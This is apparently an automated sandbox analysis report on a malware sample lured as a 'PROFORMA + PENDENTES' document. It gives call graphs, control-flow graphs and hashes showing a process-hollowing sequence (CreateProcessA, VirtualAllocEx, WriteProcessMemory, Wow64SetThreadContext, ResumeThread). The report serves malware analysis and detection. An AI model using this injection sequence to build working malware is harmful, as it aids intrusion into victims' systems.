6e4c1ea 26567->26643 26568 708022e 26568->26488 26573 70800f9 26571->26573 26572 70801a1 26572->26488 26573->26572 26575 6e4ca3c CreateProcessA 26573->26575 26576 6e4ca48 CreateProcessA 26573->26576 26574 7080206 26574->26488 26575->26574 26576->26574 26578 708025f 26577->26578 26647 6e4c7c0 26578->26647 26651 6e4c7b8 26578->26651 26579 7080962 26583 70804d9 26582->26583 26585 6e4c7c0 WriteProcessMemory 26583->26585 26586 6e4c7b8 WriteProcessMemory 26583->26586 26584 708057a 26585->26584 26586->26584 26588 708053d 26587->26588 26589 7080543 26587->26589 26591 6e4c1f0 Wow64SetThreadContext 26588->26591 26592 6e4c1ea Wow64SetThreadContext 26588->26592 26655 6e4c8a8 26589->26655 26659 6e4c8b0 26589->26659 26590 7080c06 26591->26589 26592->26589 26596 7080357 26595->26596 26597 708022e 26595->26597 26598 6e4c1f0 Wow64SetThreadContext 26596->26598 26599 6e4c1ea Wow64SetThreadContext 26596->26599 26597->26488 26598->26597 26599->26597 26601 7080452 26600->26601 26602 7080467 26601->26602 26603 6e4bd00 ResumeThread 26601->26603 26604 6e4bd08 ResumeThread 26601->26604 26602->26488 26603->26602 26604->26602 26606 7080543 26605->26606 26608 6e4c8b0 ReadProcessMemory 26606->26608 26609 6e4c8a8 ReadProcessMemory 26606->26609 26607 7080c06 26608->26607 26609->26607 26613 6e4c7c0 WriteProcessMemory 26610->26613 26614 6e4c7b8 WriteProcessMemory 26610->26614 26611 70806a6 26611->26610 26612 7080305 26611->26612 26612->26488 26613->26611 26614->26611 26616 6e4ca48 CreateProcessA 26615->26616 26618 6e4cc93 26616->26618 26618->26618 26620 6e4cad1 CreateProcessA 26619->26620 26622 6e4cc93 26620->26622 26622->26622 26624 6e4c740 VirtualAllocEx 26623->26624 26626 6e4c77d 26624->26626 26626->26546 26628 6e4c740 VirtualAllocEx 26627->26628 26630 6e4c77d 26628->26630 26630->26546 26632 6e4bd08 ResumeThread 26631->26632 26634 6e4bd79 26632->26634 26634->26551 26636 6e4bd48 ResumeThread 26635->26636 26638 6e4bd79 26636->26638 26638->26551 26640 6e4c235 Wow64SetThreadContext 26639->26640 26642 6e4c27d 26640->26642 26642->26568 26644 6e4c235 Wow64SetThreadContext 26643->26644 26646 6e4c27d 26644->26646 26646->26568 26648 6e4c808 WriteProcessMemory 26647->26648 26650 6e4c85f 26648->26650 26650->26579 26652 6e4c7c0 WriteProcessMemory 26651->26652 26654 6e4c85f 26652->26654 26654->26579 26656 6e4c8b0 ReadProcessMemory 26655->26656 26658 6e4c93f 26656->26658 26658->26590 26660 6e4c8fb ReadProcessMemory 26659->26660 26662 6e4c93f 26660->26662 26662->26590 26663 25ac300 26664 25ac348 GetModuleHandleW 26663->26664 26665 25ac342 26663->26665 26666 25ac375 26664->26666 26665->26664
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21ded539f6bb28335f8155a033554ed2aa56b1091e184cca12f592c745fb607d
                                              • Instruction ID: d2ff36b1f80f9289a513fcc0e26921b1d57989bdd67f54ab1c729b4e38b988d9
                                              • Opcode Fuzzy Hash: 21ded539f6bb28335f8155a033554ed2aa56b1091e184cca12f592c745fb607d
                                              • Instruction Fuzzy Hash: EA329BB07012059FDB98EBA4C560BAEB7F6BF88700F244569E146EB791CB35ED01CB51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2728a49eef94e467981bbd3ed243bd25efcd4bcfec092122f51fa24a739988fa
                                              • Instruction ID: 56ac3f5c54c405ccde59a1ea084a7e5698b9aa42a879dadb1f717492ab1046a7
                                              • Opcode Fuzzy Hash: 2728a49eef94e467981bbd3ed243bd25efcd4bcfec092122f51fa24a739988fa
                                              • Instruction Fuzzy Hash: 5BC1A174E042188FDB54DFAAD980A9DFBF2BF89304F24956AD819E7315EB30A941CF50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9569b8097b6bd3abfd100ba77dd48cb006894ab0045a6c1bef6931014fa8a7e
                                              • Instruction ID: 9e43f2c77eed8e8667de5796f5d4dde11d58b88b466a287fce44dea3c158da7e
                                              • Opcode Fuzzy Hash: d9569b8097b6bd3abfd100ba77dd48cb006894ab0045a6c1bef6931014fa8a7e
                                              • Instruction Fuzzy Hash: 306127B1D55219CBDB64DF66CC40BEDBBB6AF8A300F10C2EAD45DA6250EB705A85CF40
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c31d4ee291592f022fa7b71b9be98c49931d11cd54dbd6d0cc98120f9ae52eed
                                              • Instruction ID: 3ceb611b16634442f83c8743470b13b13ce2d8404e593524807b5e4cba3a4934
                                              • Opcode Fuzzy Hash: c31d4ee291592f022fa7b71b9be98c49931d11cd54dbd6d0cc98120f9ae52eed
                                              • Instruction Fuzzy Hash: 002117B0D056188FEB08DFA7D9447EEFFF6AF89300F14D06AD409A6264DB7409458FA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 35 6e4ca3c-6e4cadd 38 6e4cb16-6e4cb36 35->38 39 6e4cadf-6e4cae9 35->39 46 6e4cb6f-6e4cb9e 38->46 47 6e4cb38-6e4cb42 38->47 39->38 40 6e4caeb-6e4caed 39->40 42 6e4cb10-6e4cb13 40->42 43 6e4caef-6e4caf9 40->43 42->38 44 6e4cafd-6e4cb0c 43->44 45 6e4cafb 43->45 44->44 48 6e4cb0e 44->48 45->44 53 6e4cbd7-6e4cc91 CreateProcessA 46->53 54 6e4cba0-6e4cbaa 46->54 47->46 49 6e4cb44-6e4cb46 47->49 48->42 51 6e4cb48-6e4cb52 49->51 52 6e4cb69-6e4cb6c 49->52 55 6e4cb54 51->55 56 6e4cb56-6e4cb65 51->56 52->46 67 6e4cc93-6e4cc99 53->67 68 6e4cc9a-6e4cd20 53->68 54->53 57 6e4cbac-6e4cbae 54->57 55->56 56->56 58 6e4cb67 56->58 59 6e4cbb0-6e4cbba 57->59 60 6e4cbd1-6e4cbd4 57->60 58->52 62 6e4cbbc 59->62 63 6e4cbbe-6e4cbcd 59->63 60->53 62->63 63->63 64 6e4cbcf 63->64 64->60 67->68 78 6e4cd30-6e4cd34 68->78 79 6e4cd22-6e4cd26 68->79 81 6e4cd44-6e4cd48 78->81 82 6e4cd36-6e4cd3a 78->82 79->78 80 6e4cd28 79->80 80->78 84 6e4cd58-6e4cd5c 81->84 85 6e4cd4a-6e4cd4e 81->85 82->81 83 6e4cd3c 82->83 83->81 87 6e4cd6e-6e4cd75 84->87 88 6e4cd5e-6e4cd64 84->88 85->84 86 6e4cd50 85->86 86->84 89 6e4cd77-6e4cd86 87->89 90 6e4cd8c 87->90 88->87 89->90 92 6e4cd8d 90->92 92->92
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E4CC7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: f79e0b587af726222666030bf2c4274ca9b1875f5e965e0de4c100a72019de9c
                                              • Instruction ID: 465a230e495d28a9363f4ac530f84eee9796d483f447801a79861ebdf3cee381
                                              • Opcode Fuzzy Hash: f79e0b587af726222666030bf2c4274ca9b1875f5e965e0de4c100a72019de9c
                                              • Instruction Fuzzy Hash: A5A17A71D013198FEB60DF68DC41BEEBBB2BF48714F2485A9D809A7284DB749981CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 93 6e4ca48-6e4cadd 95 6e4cb16-6e4cb36 93->95 96 6e4cadf-6e4cae9 93->96 103 6e4cb6f-6e4cb9e 95->103 104 6e4cb38-6e4cb42 95->104 96->95 97 6e4caeb-6e4caed 96->97 99 6e4cb10-6e4cb13 97->99 100 6e4caef-6e4caf9 97->100 99->95 101 6e4cafd-6e4cb0c 100->101 102 6e4cafb 100->102 101->101 105 6e4cb0e 101->105 102->101 110 6e4cbd7-6e4cc91 CreateProcessA 103->110 111 6e4cba0-6e4cbaa 103->111 104->103 106 6e4cb44-6e4cb46 104->106 105->99 108 6e4cb48-6e4cb52 106->108 109 6e4cb69-6e4cb6c 106->109 112 6e4cb54 108->112 113 6e4cb56-6e4cb65 108->113 109->103 124 6e4cc93-6e4cc99 110->124 125 6e4cc9a-6e4cd20 110->125 111->110 114 6e4cbac-6e4cbae 111->114 112->113 113->113 115 6e4cb67 113->115 116 6e4cbb0-6e4cbba 114->116 117 6e4cbd1-6e4cbd4 114->117 115->109 119 6e4cbbc 116->119 120 6e4cbbe-6e4cbcd 116->120 117->110 119->120 120->120 121 6e4cbcf 120->121 121->117 124->125 135 6e4cd30-6e4cd34 125->135 136 6e4cd22-6e4cd26 125->136 138 6e4cd44-6e4cd48 135->138 139 6e4cd36-6e4cd3a 135->139 136->135 137 6e4cd28 136->137 137->135 141 6e4cd58-6e4cd5c 138->141 142 6e4cd4a-6e4cd4e 138->142 139->138 140 6e4cd3c 139->140 140->138 144 6e4cd6e-6e4cd75 141->144 145 6e4cd5e-6e4cd64 141->145 142->141 143 6e4cd50 142->143 143->141 146 6e4cd77-6e4cd86 144->146 147 6e4cd8c 144->147 145->144 146->147 149 6e4cd8d 147->149 149->149
                                              APIs
                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E4CC7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 079c7aedb34ffa2b88b9cfede8117a72f409ab4100d1cf9b3f05b3d39b309a85
                                              • Instruction ID: 9f1695c18188ef8f20854577d49914b2cfdc4608088e53259ad485aae51523cf
                                              • Opcode Fuzzy Hash: 079c7aedb34ffa2b88b9cfede8117a72f409ab4100d1cf9b3f05b3d39b309a85
                                              • Instruction Fuzzy Hash: A9917A71D013198FEB60DFA8DC41BEEBBB2BF48714F1485A9D809A7244DB749981CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 150 25a44d4-25a59b9 CreateActCtxA 153 25a59bb-25a59c1 150->153 154 25a59c2-25a5a1c 150->154 153->154 161 25a5a2b-25a5a2f 154->161 162 25a5a1e-25a5a21 154->162 163 25a5a40-25a5a70 161->163 164 25a5a31-25a5a3d 161->164 162->161 168 25a5a22-25a5a27 163->168 169 25a5a72-25a5af4 163->169 164->163 168->161
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 025A59A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 9c8a48bc020156fb9f1f313deb242676ad1e3c470d367f1c904152e8773e69ea
                                              • Instruction ID: 4e125dcbc54e91695817ef47858aaf4f1743fe54f5fc0dc4b5f611142dc44d8d
                                              • Opcode Fuzzy Hash: 9c8a48bc020156fb9f1f313deb242676ad1e3c470d367f1c904152e8773e69ea
                                              • Instruction Fuzzy Hash: 8041D470D00719CFDB24DFA9C844B8EBBF6BF89704F60806AD409AB255DB756949CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 172 25a58f3-25a59b9 CreateActCtxA 174 25a59bb-25a59c1 172->174 175 25a59c2-25a5a1c 172->175 174->175 182 25a5a2b-25a5a2f 175->182 183 25a5a1e-25a5a21 175->183 184 25a5a40-25a5a70 182->184 185 25a5a31-25a5a3d 182->185 183->182 189 25a5a22-25a5a27 184->189 190 25a5a72-25a5af4 184->190 185->184 189->182
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 025A59A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 7465a0cf4f744c6bc46b876d4669cf0a4e4d6ee3dc28f1f7e9c5e1c21f9663ef
                                              • Instruction ID: f275ee7b10e36ee3d2b16370c5eb8e92ddcaf359825d496b4963e28fcd891715
                                              • Opcode Fuzzy Hash: 7465a0cf4f744c6bc46b876d4669cf0a4e4d6ee3dc28f1f7e9c5e1c21f9663ef
                                              • Instruction Fuzzy Hash: 1F41AF70D00719CFEB24DFA9C984BCDBBB2BF89704F60806AD409AB255DB75694ACF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 193 6e4c7b8-6e4c80e 196 6e4c810-6e4c81c 193->196 197 6e4c81e-6e4c85d WriteProcessMemory 193->197 196->197 199 6e4c866-6e4c896 197->199 200 6e4c85f-6e4c865 197->200 200->199
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E4C850
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 13bc640470d58f785dfe8f4f94c21c5f6f3384f8895c571062c37e933711dd2c
                                              • Instruction ID: d101690fb45652aa053b5cc974053bb61ec490e7257a410916315e695f223976
                                              • Opcode Fuzzy Hash: 13bc640470d58f785dfe8f4f94c21c5f6f3384f8895c571062c37e933711dd2c
                                              • Instruction Fuzzy Hash: E52139719003499FDB10DFAAD885BEEBBF5FF48710F108429E518A7240C778A540CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 204 6e4c7c0-6e4c80e 206 6e4c810-6e4c81c 204->206 207 6e4c81e-6e4c85d WriteProcessMemory 204->207 206->207 209 6e4c866-6e4c896 207->209 210 6e4c85f-6e4c865 207->210 210->209
                                              APIs
                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E4C850
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 6ef712bae321738ca7113d12ee3e7cd5dc7b3c6544dc0f4ac5eeb89b0172d694
                                              • Instruction ID: 52b9244460b755849acddadd01599824e4aa45769144ee2cc0a51a8e19a055d8
                                              • Opcode Fuzzy Hash: 6ef712bae321738ca7113d12ee3e7cd5dc7b3c6544dc0f4ac5eeb89b0172d694
                                              • Instruction Fuzzy Hash: 43212671D003499FDB10DFAAD885BDEBBF5FF48710F108429E918A7240C778A950CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 214 6e4c8a8-6e4c93d ReadProcessMemory 218 6e4c946-6e4c976 214->218 219 6e4c93f-6e4c945 214->219 219->218
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06E4C930
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: aad6822d304a8bab9e4bc158a8a7debfce2c3be6840e888b70d87793c7a388b6
                                              • Instruction ID: e4509a17ee40e6090456be9126346ad52e4a8254e267ace6f980d417bfacb77f
                                              • Opcode Fuzzy Hash: aad6822d304a8bab9e4bc158a8a7debfce2c3be6840e888b70d87793c7a388b6
                                              • Instruction Fuzzy Hash: 1921F4B18007499FDB10DFAAC885AEEBBF5FF48720F108429E558A7250C779A951CBA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 223 25adc70-25ae674 DuplicateHandle 225 25ae67d-25ae69a 223->225 226 25ae676-25ae67c 223->226 226->225
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025AE5A6,?,?,?,?,?), ref: 025AE667
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 619b6111076ace48ecbc49ccf8ba7c4ca8d83608eb159ac449ab7fbdfd707ece
                                              • Instruction ID: c133e8d28d3af3d9693b019dc41bd2eb8c207684fea83f85a24e18640a700ca1
                                              • Opcode Fuzzy Hash: 619b6111076ace48ecbc49ccf8ba7c4ca8d83608eb159ac449ab7fbdfd707ece
                                              • Instruction Fuzzy Hash: 2821E4B59002489FDB10CFAAD985ADEBBF9FB48310F14842AE914A3310D378A950CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 229 6e4c1ea-6e4c23b 231 6e4c23d-6e4c249 229->231 232 6e4c24b-6e4c27b Wow64SetThreadContext 229->232 231->232 234 6e4c284-6e4c2b4 232->234 235 6e4c27d-6e4c283 232->235 235->234
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4C26E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: aefc150dcb6bed9e14258b2fa853134e37497454a56ddaf822b83c75a6a8d6dc
                                              • Instruction ID: b8b1eef784433c50023c53d20404d15ea2b2feac7d85ee4e8a3ea20e27ffa262
                                              • Opcode Fuzzy Hash: aefc150dcb6bed9e14258b2fa853134e37497454a56ddaf822b83c75a6a8d6dc
                                              • Instruction Fuzzy Hash: B5213871D007498FDB10DFAAC8847EEBBF5EF88714F24842AD419A7240CB789945CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 239 6e4c1f0-6e4c23b 241 6e4c23d-6e4c249 239->241 242 6e4c24b-6e4c27b Wow64SetThreadContext 239->242 241->242 244 6e4c284-6e4c2b4 242->244 245 6e4c27d-6e4c283 242->245 245->244
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4C26E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: b4dcff25d51a807f327b2a10462e0da6a6c416b09b758fe530bfd52c0172eef6
                                              • Instruction ID: 14b8478454863cdfb6bfbe492fddf588372482a5160514e1edbbdf5091f8c567
                                              • Opcode Fuzzy Hash: b4dcff25d51a807f327b2a10462e0da6a6c416b09b758fe530bfd52c0172eef6
                                              • Instruction Fuzzy Hash: 07213B71D007098FDB50DFAAC8857EEBBF5EF89724F148429D419A7240CB789945CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 249 6e4c8b0-6e4c93d ReadProcessMemory 252 6e4c946-6e4c976 249->252 253 6e4c93f-6e4c945 249->253 253->252
                                              APIs
                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06E4C930
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 6c58086788a7e83ff8c4dcf633a8ca6fac390102fb538589bab17693e06c00a3
                                              • Instruction ID: 121e9f14d009ee91f197e721a92c8f43ccdecb9a24e255e48eaa186011404d46
                                              • Opcode Fuzzy Hash: 6c58086788a7e83ff8c4dcf633a8ca6fac390102fb538589bab17693e06c00a3
                                              • Instruction Fuzzy Hash: CC2116718003499FDB10DFAAC884BEEBBF5FF48720F108429E518A7250C7799941CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 257 6e4c6f8-6e4c77b VirtualAllocEx 260 6e4c784-6e4c7a9 257->260 261 6e4c77d-6e4c783 257->261 261->260
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06E4C76E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 274b02a5ca6bdf5bfc05c8d25f4f7bcbc2cb2d7cfe35ab88a7db7681c3a63aa5
                                              • Instruction ID: 850affa721978430d6d39a533255154fcf08b1e92fe62674c3aee51fe85a9690
                                              • Opcode Fuzzy Hash: 274b02a5ca6bdf5bfc05c8d25f4f7bcbc2cb2d7cfe35ab88a7db7681c3a63aa5
                                              • Instruction Fuzzy Hash: 041129758043488FDB10DFAAD844BEFBBF6EF88720F248419D515A7250C7759950CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 265 6e4bd00-6e4bd77 ResumeThread 269 6e4bd80-6e4bda5 265->269 270 6e4bd79-6e4bd7f 265->270 270->269
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: ba6ab3690904111ee4e9a7000599feada1f064cb0cdc65f3a7d0bdada94da5e2
                                              • Instruction ID: 337c8a84f3d6d0337676fbc019924348b60119e8a9d3f4023ad0f928092ff0b8
                                              • Opcode Fuzzy Hash: ba6ab3690904111ee4e9a7000599feada1f064cb0cdc65f3a7d0bdada94da5e2
                                              • Instruction Fuzzy Hash: 311149718003488FDB20DFAAD4457DEBBF5EF88720F14841AD455A7240CB79A940CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 274 6e4c700-6e4c77b VirtualAllocEx 277 6e4c784-6e4c7a9 274->277 278 6e4c77d-6e4c783 274->278 278->277
                                              APIs
                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06E4C76E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: b8ba0edc73e4cf0b89d554c33625571516e25ba7ff4356274a6474733c247965
                                              • Instruction ID: 11c5ac3a76227352bf0e4c8faa6c0958ba364e13328af021b286a76f970fcd6b
                                              • Opcode Fuzzy Hash: b8ba0edc73e4cf0b89d554c33625571516e25ba7ff4356274a6474733c247965
                                              • Instruction Fuzzy Hash: 4B1149718003489FDB10DFAAD844BDFBBF6EF88720F248419E515A7250C779A950CFA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a0c68ff0df43fb42c895749df825b511a9e883b59662db094874d459dda9166c
                                              • Instruction ID: 855f47f6abd842799d6daa76bd635a1fa29fc438e2c931c4a4459128ae943b95
                                              • Opcode Fuzzy Hash: a0c68ff0df43fb42c895749df825b511a9e883b59662db094874d459dda9166c
                                              • Instruction Fuzzy Hash: E9112571D003488FDB20DFAAD8457DEFBF9EF88624F24841AD419A7240CB79A940CFA4
                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 07081315
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 14e1b333a4c443eb1be80ffa2eff539f69ab408c0a6f294e031a5077710f0995
                                              • Instruction ID: 0838703173e341584f1e71fe9e84ccfea63c30590834f802c46b2903149126bf
                                              • Opcode Fuzzy Hash: 14e1b333a4c443eb1be80ffa2eff539f69ab408c0a6f294e031a5077710f0995
                                              • Instruction Fuzzy Hash: 8911F2B58002499FDB20DF9AC884BDEFBF8FB49320F148419E558A7600D379A945CFA1
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 025AC366
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 551b6a8e939ee5e79462f9198919517a9ddd3e2b589755f8a059d53b28039911
                                              • Instruction ID: 331a3e6528e895df47629d553ec2f8f916ff07ba17d847616a9a9a08e17f6d76
                                              • Opcode Fuzzy Hash: 551b6a8e939ee5e79462f9198919517a9ddd3e2b589755f8a059d53b28039911
                                              • Instruction Fuzzy Hash: 251110B5C003498FDB10CF9AC444BDEFBF5FB89624F10842AD428A7200C3B9A545CFA9
                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 07081315
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b11c620c7baeb146a988b2c09458b452cf01dd41d126342eb3878346135993ed
                                              • Instruction ID: a8ecc46f252c5b96faeb9e01451d1bac66cd62d399f9f06c8be252e45ca259a5
